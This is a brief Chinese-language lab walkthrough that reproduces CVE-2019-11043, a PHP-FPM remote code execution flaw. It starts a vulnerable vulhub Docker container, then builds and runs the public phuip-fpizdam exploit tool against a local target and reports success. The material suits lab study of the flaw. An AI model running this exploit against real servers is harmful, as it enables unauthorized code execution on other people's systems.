知其然,知其所以然。
原理:https://github.com/neex/phuip-fpizdam/blob/master/ZeroNights2019.pdf
docker使用别人搭建好的环境
git clone https://github.com/vulhub/vulhub.git //git将vulhub下载到本地
cd vulhub/php/CVE-2019-11043 //进入CVE-2019-11043的目录
docker-compose up -d //下载启动容器
docker ps //查看docker进程
出现如下截图,说明成功。
git clone https://github.com/neex/phuip-fpizdam.git
cd phuip-fpizdam
go get -v&& go build
go run . "http:127.0.0.1:8080/index.php"
发现利用成功。